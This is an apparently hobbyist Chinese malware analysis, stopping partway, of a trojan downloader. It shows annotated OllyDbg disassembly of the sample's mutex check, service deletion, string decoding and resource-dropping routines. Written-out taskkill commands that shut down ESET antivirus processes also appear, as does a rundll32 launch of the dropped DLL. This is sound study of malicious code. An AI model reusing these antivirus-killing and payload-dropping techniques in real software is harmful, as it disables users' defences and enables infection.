Trojan-Downloader.Win32.Geral.iql 样本 不完全分析
【加壳方式】: UPX
【使用工具】: OD
【软件介绍】: dowloader
【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
peid检查是upx壳,脱壳后od载入.
0040314A > $ 55 push ebp
0040314B . 8BEC mov ebp, esp
0040314D . 81EC 740B0000 sub esp, 0B74
00403153 . 53 push ebx
00403154 . 56 push esi
00403155 . 57 push edi
00403156 . E8 A3E2FFFF call download.004013FE ; 获取系统API地址
0040315B . 68 64134000 push download.00401364 ; /MutexName = "AAeesstt..."
00403160 . 6A 00 push 0 ; |InitialOwner = FALSE
00403162 . 6A 00 push 0 ; |pSecurity = NULL
00403164 . FF15 60104000 call dword ptr ds:[<&KERNEL32.CreateMutexA>>; /CreateMutexA
0040316A . 8985 A0F6FFFF mov dword ptr ss:[ebp-960], eax
00403170 . FF15 C4114000 call dword ptr ds:[4011C4] ; ntdll.RtlGetLastWin32Error
下面获取系统explorer.exe路径
004031D9 . C645 F0 5C mov byte ptr ss:[ebp-10], 5C
004031DD . C645 F1 45 mov byte ptr ss:[ebp-F], 45
004031E1 . C645 F2 78 mov byte ptr ss:[ebp-E], 78
004031E5 . C645 F3 70 mov byte ptr ss:[ebp-D], 70
004031E9 . C645 F4 6C mov byte ptr ss:[ebp-C], 6C
004031ED . C645 F5 6F mov byte ptr ss:[ebp-B], 6F
004031F1 . C645 F6 72 mov byte ptr ss:[ebp-A], 72
004031F5 . C645 F7 65 mov byte ptr ss:[ebp-9], 65
004031F9 . C645 F8 72 mov byte ptr ss:[ebp-8], 72
004031FD . C645 F9 2E mov byte ptr ss:[ebp-7], 2E
00403201 . C645 FA 45 mov byte ptr ss:[ebp-6], 45
00403205 . C645 FB 58 mov byte ptr ss:[ebp-5], 58
00403209 . C645 FC 45 mov byte ptr ss:[ebp-4], 45
0040320D . 8065 FD 00 and byte ptr ss:[ebp-3], 0
00403211 . 68 FF000000 push 0FF
00403216 . 6A 00 push 0
00403218 . 8D85 90F5FFFF lea eax, dword ptr ss:[ebp-A70]
0040321E . 50 push eax
0040321F . E8 9C090000 call download.00403BC0
00403224 . 83C4 0C add esp, 0C
00403227 . 68 FF000000 push 0FF
0040322C . 6A 00 push 0
0040322E . 8D85 ECFBFFFF lea eax, dword ptr ss:[ebp-414]
00403234 . 50 push eax
00403235 . E8 86090000 call download.00403BC0
0040323A . 83C4 0C add esp, 0C
0040323D . 68 FF000000 push 0FF
00403242 . 8D85 ECFBFFFF lea eax, dword ptr ss:[ebp-414]
00403248 . 50 push eax
00403249 . FF15 A4114000 call dword ptr ds:[4011A4] ; kernel32.GetWindowsDirectoryA
0040324F . 68 FF000000 push 0FF
00403254 . 8D85 ECFCFFFF lea eax, dword ptr ss:[ebp-314]
0040325A . 50 push eax
0040325B . FF15 A4114000 call dword ptr ds:[4011A4] ; kernel32.GetWindowsDirectoryA
00403261 . 8D45 F0 lea eax, dword ptr ss:[ebp-10]
00403264 . 50 push eax ; /StringToAdd
00403265 . 8D85 ECFCFFFF lea eax, dword ptr ss:[ebp-314] ; |
0040326B . 50 push eax ; |ConcatString
0040326C . FF15 34104000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA
00403272 . 90 nop
00403384 . C685 90F6FFFF>mov byte ptr ss:[ebp-970], 5C ;路径:drivers/gm.dls
00403416 . FF15 00104000 call dword ptr ds:[<&KERNEL32.lstrcmpiA>] ; /lstrcmpiA 这里通过路径比较当前路径是不是explorer.exe
0040341C . 85C0 test eax, eax
0040341E . 0F85 AC000000 jnz download.004034D0 ;不等跳走
删除erkn服务
00402742 . FF15 CC114000 call dword ptr ds:[4011CC] ; ADVAPI32.OpenSCManagerA
00402748 . 8945 FC mov dword ptr ss:[ebp-4], eax
0040274B . 837D FC 00 cmp dword ptr ss:[ebp-4], 0
0040274F . 74 44 je short download.00402795
00402751 . 68 20000100 push 10020 ; UNICODE "C:/Documents and Settings/All Users"
00402756 . FF75 08 push dword ptr ss:[ebp+8]
00402759 . FF75 FC push dword ptr ss:[ebp-4]
0040275C . FF15 E4114000 call dword ptr ds:[4011E4] ; ADVAPI32.OpenServiceA
00402762 . 8945 F8 mov dword ptr ss:[ebp-8], eax
00402765 . 837D F8 00 cmp dword ptr ss:[ebp-8], 0
00402769 . 74 21 je short download.0040278C
0040276B . 8D45 DC lea eax, dword ptr ss:[ebp-24]
0040276E . 50 push eax
0040276F . 6A 01 push 1
00402771 . FF75 F8 push dword ptr ss:[ebp-8]
00402774 . FF15 E0114000 call dword ptr ds:[4011E0] ; ADVAPI32.ControlService
0040277A . FF75 F8 push dword ptr ss:[ebp-8]
0040277D . FF15 D4114000 call dword ptr ds:[4011D4] ; ADVAPI32.DeleteService
00402783 . FF75 F8 push dword ptr ss:[ebp-8]
00402786 . FF15 D8114000 call dword ptr ds:[4011D8] ; ADVAPI32.CloseServiceHandle
0040278C > FF75 FC push dword ptr ss:[ebp-4]
0040278F . FF15 D8114000 call dword ptr ds:[4011D8] ; ADVAPI32.CloseServiceHandle
解码函数
00402035 /$ 56 push esi
00402036 |. 57 push edi
00402037 |. 8B7C24 0C mov edi, dword ptr ss:[esp+C]
0040203B |. 33F6 xor esi, esi
0040203D |. 57 push edi
0040203E |. E8 CD1A0000 call download.00403B10
00402043 |. 85C0 test eax, eax
00402045 |. 59 pop ecx
00402046 |. 76 0F jbe short download.00402057
00402048 |> FE0C3E /dec byte ptr ds:[esi+edi]
0040204B |. 57 |push edi
0040204C |. 46 |inc esi
0040204D |. E8 BE1A0000 |call download.00403B10 ; 解码算法
00402052 |. 3BF0 |cmp esi, eax ; eax字符串长度
00402054 |. 59 |pop ecx
00402055 |.^ 72 F1 /jb short download.00402048
00402057 |> 8BC7 mov eax, edi
00402059 |. 5F pop edi
0040205A |. 5E pop esi
0040205B /. C3 retn
干掉某xx杀软
cmd.exe /c taskkill.exe /im ekrn.exe /f
cmd.exe /c taskkill.exe /im egui.exe /f
00402BA2 |. FF15 7C114000 call dword ptr ds:[40117C] ; kernel32.WinExec
00402BA8 |. 8D45 A8 lea eax, dword ptr ss:[ebp-58]
00402BAB |. 50 push eax
00402BAC |. E8 84F4FFFF call download.00402035 ;cmd.exe /c taskkill.exe /im egui.exe /f
00402BB1 |. 59 pop ecx
00402BB2 |. 50 push eax
00402BB3 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
00402BB9 |. 50 push eax
00402BBA |. FFD6 call esi ; kernel32.lstrcpyA
00402BBC |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
00402BC2 |. 6A 00 push 0
00402BC4 |. 50 push eax
00402BC5 |. FF15 7C114000 call dword ptr ds:[40117C] ; kernel32.WinExec
00402BCB |. 68 70170000 push 1770 ; /Timeout = 6000. ms
00402BD0 |. FF15 40104000 call dword ptr ds:[<&KERNEL32.Sleep>] ; /Sleep
生成要释放的临时文件名
00402EF2 . 68 70104000 push download.00401070 ; ASCII "24131375.tt"
00402EF7 . 68 50134000 push download.00401350 ; ASCII "%s%d.tt"
00402EFC . 68 70104000 push download.00401070 ; ASCII "24131375.tt"
00402F01 . FF15 80114000 call dword ptr ds:[401180] ; USER32.wsprintfA
00402F07 . 83C4 10 add esp, 10
00402F0A . 68 04010000 push 104
00402F0F . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C]
00402F15 . 50 push eax
00402F16 . FF15 A8114000 call dword ptr ds:[4011A8] ; kernel32.GetSystemDirectoryA
00402F1C . 68 4C134000 push download.0040134C ; /StringToAdd = "/"
00402F21 . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C] ; |
00402F27 . 50 push eax ; |ConcatString
00402F28 . FF15 34104000 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA
00402F2E . 8D85 B4FCFFFF lea eax, dword ptr ss:[ebp-34C]
00402F34 . 50 push eax ; /String2
00402F35 . 8D85 E0FEFFFF lea eax, dword ptr ss:[ebp-120] ; |
00402F3B . 50 push eax ; |String1
00402F3C . FF15 28104000 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; /lstrcpyA
创建临时文件,然后从自身资源中释放dll写入临时文件
0040209A . 6A 00 push 0 ; /hTemplateFile = NULL
0040209C . 6A 00 push 0 ; |Attributes = 0
0040209E . 6A 02 push 2 ; |Mode = CREATE_ALWAYS
004020A0 . 6A 00 push 0 ; |pSecurity = NULL
004020A2 . 6A 00 push 0 ; |ShareMode = 0
004020A4 . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004020A9 . FF75 08 push dword ptr ss:[ebp+8] ; |FileName
004020AC . FF15 20104000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004020B2 . 8945 F0 mov dword ptr ss:[ebp-10], eax
004020B5 . 8B45 F0 mov eax, dword ptr ss:[ebp-10]
004020B8 . 8945 F4 mov dword ptr ss:[ebp-C], eax
004020BB . 837D F0 00 cmp dword ptr ss:[ebp-10], 0
004020BF . 0F84 9C000000 je download.00402161
004020C5 . 8D45 E8 lea eax, dword ptr ss:[ebp-18]
004020C8 . 50 push eax ; /ResourceType
004020C9 . FF75 0C push dword ptr ss:[ebp+C] ; |ResourceName
004020CC . 6A 00 push 0 ; |hModule = NULL
004020CE . FF15 1C104000 call dword ptr ds:[<&KERNEL32.FindResourceA>] ; /FindResourceA
004020D4 . 8945 E4 mov dword ptr ss:[ebp-1C], eax
004020D7 . 8B45 E4 mov eax, dword ptr ss:[ebp-1C]
004020DA . 8945 E0 mov dword ptr ss:[ebp-20], eax
004020DD . FF75 E4 push dword ptr ss:[ebp-1C] ; /hResource
004020E0 . 6A 00 push 0 ; |hModule = NULL
004020E2 . FF15 18104000 call dword ptr ds:[<&KERNEL32.LoadResource>] ; /LoadResource
004020E8 . 8945 D8 mov dword ptr ss:[ebp-28], eax
004020EB . 8B45 D8 mov eax, dword ptr ss:[ebp-28]
004020EE . 8945 F8 mov dword ptr ss:[ebp-8], eax
004020F1 . 8365 D4 00 and dword ptr ss:[ebp-2C], 0
004020F5 . FF75 D8 push dword ptr ss:[ebp-28] ; /nHandles
004020F8 . FF15 14104000 call dword ptr ds:[<&KERNEL32.LockResource>] ; /SetHandleCount
004020FE . 8945 EC mov dword ptr ss:[ebp-14], eax
00402101 . 8065 FC 00 and byte ptr ss:[ebp-4], 0
00402105 . 90 nop
00402106 . FF75 E0 push dword ptr ss:[ebp-20] ; /hResource
00402109 . 6A 00 push 0 ; |hModule = NULL
0040210B . FF15 10104000 call dword ptr ds:[<&KERNEL32.SizeofResource>>; /SizeofResource
00402111 . 85C0 test eax, eax
00402113 . 74 3A je short download.0040214F
00402115 . 90 nop
00402116 > 8B45 EC mov eax, dword ptr ss:[ebp-14]
00402119 . 0345 D4 add eax, dword ptr ss:[ebp-2C]
0040211C . 0FB600 movzx eax, byte ptr ds:[eax]
0040211F . 40 inc eax
00402120 . 8845 FC mov byte ptr ss:[ebp-4], al
00402123 . 6A 00 push 0 ; /pOverlapped = NULL
00402125 . 8D45 DC lea eax, dword ptr ss:[ebp-24] ; |
00402128 . 50 push eax ; |pBytesWritten
00402129 . 6A 01 push 1 ; |nBytesToWrite = 1
0040212B . 8D45 FC lea eax, dword ptr ss:[ebp-4] ; |
0040212E . 50 push eax ; |Buffer
0040212F . FF75 F4 push dword ptr ss:[ebp-C] ; |hFile
00402132 . FF15 0C104000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; /WriteFile
00402138 . 8B45 D4 mov eax, dword ptr ss:[ebp-2C]
0040213B . 40 inc eax
0040213C . 8945 D4 mov dword ptr ss:[ebp-2C], eax
0040213F . FF75 E0 push dword ptr ss:[ebp-20] ; /hResource
00402142 . 6A 00 push 0 ; |hModule = NULL
00402144 . FF15 10104000 call dword ptr ds:[<&KERNEL32.SizeofResource>>; /SizeofResource
0040214A . 3945 D4 cmp dword ptr ss:[ebp-2C], eax
0040214D .^ 72 C7 jb short download.00402116
0040214F > FF75 F8 push dword ptr ss:[ebp-8] ; /hResource
00402152 . FF15 08104000 call dword ptr ds:[<&KERNEL32.FreeResource>] ; /FreeResource
00402158 . FF75 F4 push dword ptr ss:[ebp-C] ; /hObject
0040215B . FF15 04104000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; /CloseHandle
00402161 > 5F pop edi
00402162 . 5E pop esi
00402163 . 5B pop ebx
00402164 . C9 leave
00402165 . C2 0800 retn 8
先kill掉一些杀软进程
00403052 . E8 67FCFFFF call download.00402CBE
00402CBE /$ 55 push ebp
00402CBF |. 8BEC mov ebp, esp
00402CC1 |. 81EC 40010000 sub esp, 140
00402CC7 |. 56 push esi
00402CC8 |. 57 push edi
00402CC9 |. 6A 10 push 10
00402CCB |. C745 C0 44134>mov dword ptr ss:[ebp-40], download.00401344 ; ASCII "rstray"
00402CD2 |. C745 C4 38134>mov dword ptr ss:[ebp-3C], download.00401338 ; ASCII "stofutws"
00402CD9 |. C745 C8 30134>mov dword ptr ss:[ebp-38], download.00401330 ; ASCII "ddfoufs"
00402CE0 |. C745 CC 28134>mov dword ptr ss:[ebp-34], download.00401328 ; ASCII "tdbogsn"
00402CE7 |. C745 D0 20134>mov dword ptr ss:[ebp-30], download.00401320 ; ASCII "sbwnpoe"
00402CEE |. C745 D4 18134>mov dword ptr ss:[ebp-2C], download.00401318 ; ASCII "sbwubtl"
00402CF5 |. C745 D8 10134>mov dword ptr ss:[ebp-28], download.00401310 ; ASCII "stnbjo"
00402CFC |. C745 DC 08134>mov dword ptr ss:[ebp-24], download.00401308 ; ASCII "sgxtsw"
00402D03 |. C745 E0 04134>mov dword ptr ss:[ebp-20], download.00401304 ; ASCII "sbt"
00402D0A |. C745 E4 F8124>mov dword ptr ss:[ebp-1C], download.004012F8 ; ASCII "lbwtubsu"
00402D11 |. C745 E8 F0124>mov dword ptr ss:[ebp-18], download.004012F0 ; ASCII "ljttwd"
00402D18 |. C745 EC E4124>mov dword ptr ss:[ebp-14], download.004012E4 ; ASCII "lbnjmnpo"
00402D1F |. C745 F0 DC124>mov dword ptr ss:[ebp-10], download.004012DC ; ASCII "lqgx43"
00402D26 |. C745 F4 D4124>mov dword ptr ss:[ebp-C], download.004012D4 ; ASCII "lqgxtwd"
00402D2D |. C745 F8 CC124>mov dword ptr ss:[ebp-8], download.004012CC ; ASCII "lxbudi"
00402D34 |. C745 FC C4124>mov dword ptr ss:[ebp-4], download.004012C4 ; ASCII "lbddpsf"
00402D3B |. 8D75 C0 lea esi, dword ptr ss:[ebp-40]
00402D3E |. 5F pop edi
00402D3F |> 68 FF000000 /push 0FF
00402D44 |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D4A |. 6A 00 |push 0
00402D4C |. 50 |push eax
00402D4D |. E8 6E0E0000 |call download.00403BC0
00402D52 |. FF36 |push dword ptr ds:[esi]
00402D54 |. E8 DCF2FFFF |call download.00402035
00402D59 |. 83C4 10 |add esp, 10
00402D5C |. 50 |push eax ; /String2
00402D5D |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140] ; |
00402D63 |. 50 |push eax ; |String1
00402D64 |. FF15 28104000 |call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; /lstrcpyA
00402D6A |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D70 |. 68 BC124000 |push download.004012BC ; /StringToAdd = ".exe"
00402D75 |. 50 |push eax ; |ConcatString
00402D76 |. FF15 34104000 |call dword ptr ds:[<&KERNEL32.lstrcatA>] ; /lstrcatA
00402D7C |. 8D85 C0FEFFFF |lea eax, dword ptr ss:[ebp-140]
00402D82 |. 50 |push eax
00402D83 |. E8 52FEFFFF |call download.00402BDA
00402D88 |. 85C0 |test eax, eax
00402D8A |. 59 |pop ecx
00402D8B |. 74 07 |je short download.00402D94
00402D8D |. 50 |push eax
00402D8E |. E8 BFFEFFFF |call download.00402C52
00402D93 |. 59 |pop ecx
00402D94 |> 68 F4010000 |push 1F4 ; /Timeout = 500. ms
00402D99 |. FF15 40104000 |call dword ptr ds:[<&KERNEL32.Sleep>] ; /Sleep
创建进程,运行临时文件
C:/WINDOWS/system32/rundll32.exe C:/WINDOWS/system32/24131375.tt testall
004030BD . FF15 54104000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; /CreateProcessA
等待运行完毕
004030C3 . 85C0 test eax, eax
004030C5 . 74 14 je short download.004030DB
004030C7 . FF75 F4 push dword ptr ss:[ebp-C] ; /hObject
004030CA . FF15 04104000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004030D0 . 6A FF push -1 ; /Timeout = INFINITE
004030D2 . FF75 F0 push dword ptr ss:[ebp-10] ; |hObject
004030D5 . FF15 50104000 call dword ptr ds:[<&KERNEL32.WaitForSingleObj>; /WaitForSingleObject
到此,病毒刚刚完成1/3的工作。歇一会,哈哈。